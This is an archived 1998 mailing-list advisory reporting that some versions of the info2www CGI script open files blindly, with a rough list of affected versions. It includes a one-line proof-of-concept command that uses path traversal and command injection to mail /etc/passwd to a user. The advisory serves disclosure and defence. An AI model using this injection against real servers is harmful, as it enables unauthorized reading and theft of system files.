Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: info2w~1.txt

Info2www CGI - blindly allows files to open

Date: Tue, 3 Mar 1998 11:26:49 +0000
From: Niall Smart <njs3@DOC.IC.AC.UK>
Subject: Vulnerabilites in some versions of info2www CGI


Some versions of the info2www CGI blindly open files:

$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passw
You have new mail.

Trying to track down which versions of info2www have this bug and which
don't has been difficult, there are lots of variants out there, some
of which aren't vulnerable.  Instead of trying to make a list of versions
which are vulnerable I'll just say that:

 - if it has no version number, its probably vulnerable
 - the uuencoded version at CPAN is corrupt, and the one
   which the README file tells you to get is vulnerable
 - version 1.1 is vulnerable
 - version 1.2.x seem ok (but I'm no perl expert)

Apparently info2www is based on info2html and infogate, so these may
have problems too.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH